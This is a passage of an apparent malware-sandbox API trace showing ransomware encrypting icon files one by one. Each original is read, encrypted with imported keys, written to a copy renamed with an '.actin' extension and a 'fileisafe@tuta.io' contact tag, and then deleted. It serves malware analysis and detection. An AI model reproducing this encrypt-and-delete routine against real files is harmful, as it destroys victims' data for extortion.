(hEvent=0x2e8) returned 1 [0048.602] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0048.602] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0048.602] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=894) returned 1 [0048.602] CloseHandle (hObject=0x348) returned 1 [0048.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico")) returned 0x80 [0048.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0048.602] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0048.602] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.602] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.602] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.603] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71ac0) returned 1 [0048.603] CryptSetKeyParam (hKey=0xf71ac0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.603] ReadFile (in: hFile=0x348, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x37e, lpOverlapped=0x0) returned 1 [0049.135] CryptEncrypt (in: hKey=0xf71ac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x380, dwBufLen=0x380 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x380) returned 1 [0049.135] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x380, lpOverlapped=0x0) returned 1 [0049.136] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b40) returned 1 [0049.136] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0049.136] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0049.136] CryptDestroyKey (hKey=0xf71b40) returned 1 [0049.136] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0049.136] CryptDestroyKey (hKey=0xf71ac0) returned 1 [0049.136] CloseHandle (hObject=0x348) returned 1 [0049.136] CloseHandle (hObject=0x338) returned 1 [0049.137] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico")) returned 1 [0049.138] SetEvent (hEvent=0x2e8) returned 1 [0049.138] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0049.138] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0049.138] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=36710) returned 1 [0049.138] CloseHandle (hObject=0x338) returned 1 [0049.138] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico")) returned 0x80 [0049.139] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0049.139] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0049.139] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0049.139] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0049.139] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0049.140] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72100) returned 1 [0049.140] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0049.140] ReadFile (in: hFile=0x338, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x8f66, lpOverlapped=0x0) returned 1 [0049.141] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x8f70, dwBufLen=0x8f70 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x8f70) returned 1 [0049.141] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x8f70, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x8f70, lpOverlapped=0x0) returned 1 [0049.142] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71a40) returned 1 [0049.142] CryptSetKeyParam (hKey=0xf71a40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0049.142] CryptEncrypt (in: hKey=0xf71a40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0049.143] CryptDestroyKey (hKey=0xf71a40) returned 1 [0049.143] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0049.143] CryptDestroyKey (hKey=0xf72100) returned 1 [0049.143] CloseHandle (hObject=0x338) returned 1 [0049.143] CloseHandle (hObject=0x348) returned 1 [0049.144] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico")) returned 1 [0049.145] SetEvent (hEvent=0x2e8) returned 1 [0049.145] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0049.145] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0049.145] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=10134) returned 1 [0049.145] CloseHandle (hObject=0x348) returned 1 [0049.148] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico")) returned 0x80 [0049.148] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0049.148] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0049.148] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0049.148] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0049.148] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0049.148] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71cc0) returned 1 [0049.148] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0049.148] ReadFile (in: hFile=0x348, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x2796, lpOverlapped=0x0) returned 1 [0049.149] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x27a0, dwBufLen=0x27a0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x27a0) returned 1 [0049.149] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x27a0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x27a0, lpOverlapped=0x0) returned 1 [0049.150] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d80) returned 1 [0049.150] CryptSetKeyParam (hKey=0xf71d80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0049.150] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0049.151] CryptDestroyKey (hKey=0xf71d80) returned 1 [0049.151] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0049.151] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0049.151] CloseHandle (hObject=0x348) returned 1 [0049.151] CloseHandle (hObject=0x338) returned 1 [0049.152] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico")) returned 1 [0049.153] SetEvent (hEvent=0x2e8) returned 1 [0049.153] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0049.153] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0049.153] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=1150) returned 1 [0049.153] CloseHandle (hObject=0x338) returned 1 [0049.153] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico")) returned 0x80 [0049.153] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0049.153] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0049.153] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0049.153] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0049.153] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0049.153] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72040) returned 1 [0049.154] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0049.154] ReadFile (in: hFile=0x338, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x47e, lpOverlapped=0x0) returned 1 [0049.155] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x480, dwBufLen=0x480 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x480) returned 1 [0049.155] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x480, lpOverlapped=0x0) returned 1 [0049.156] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72100) returned 1 [0049.156] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0049.156] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0049.156] CryptDestroyKey (hKey=0xf72100) returned 1 [0049.156] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0049.156] CryptDestroyKey (hKey=0xf72040) returned 1 [0049.156] CloseHandle (hObject=0x338) returned 1 [0049.156] CloseHandle (hObject=0x348) returned 1 [0049.157] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico")) returned 1 [0049.158] SetEvent (hEvent=0x2e8) returned 1 [0049.158] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0049.158] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0049.158] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=1150) returned 1 [0049.158] CloseHandle (hObject=0x348) returned 1 [0049.158] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico")) returned 0x80 [0049.158] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0049.158] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0049.158] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0049.158] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0049.158] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0049.158] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71e80) returned 1 [0049.158] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0049.158] ReadFile (in: hFile=0x348, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x47e, lpOverlapped=0x0) returned 1 [0049.160] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x480, dwBufLen=0x480 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x480) returned 1 [0049.160] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x480, lpOverlapped=0x0) returned 1 [0049.161] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71a00) returned 1 [0049.161] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0049.161] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0049.161] CryptDestroyKey (hKey=0xf71a00) returned 1 [0049.161] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0049.161] CryptDestroyKey (hKey=0xf71e80) returned 1 [0049.161] CloseHandle (hObject=0x348) returned 1 [0049.161] CloseHandle (hObject=0x338) returned 1 [0049.162] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico")) returned 1 [0049.162] SetEvent (hEvent=0x2e8) returned 1 [0049.162] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0049.162] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0049.163] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=10134) returned 1 [0049.163] CloseHandle (hObject=0x338) returned 1 [0049.163] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico")) returned 0x80 [0049.163] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0049.163] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0049.163] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0049.163] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0049.163] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0049.163] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71ac0) returned 1 [0049.163] CryptSetKeyParam (hKey=0xf71ac0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0049.163] ReadFile (in: hFile=0x338, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x2796, lpOverlapped=0x0) returned 1 [0049.165] CryptEncrypt (in: hKey=0xf71ac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x27a0, dwBufLen=0x27a0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x27a0) returned 1 [0049.165] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x27a0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x27a0, lpOverlapped=0x0) returned 1 [0049.166] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b40) returned 1 [0049.166] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0049.166] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0049.166] CryptDestroyKey (hKey=0xf71b40) returned 1 [0049.166] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0049.166] CryptDestroyKey (hKey=0xf71ac0) returned 1 [0049.166] CloseHandle (hObject=0x338) returned 1 [0049.166] 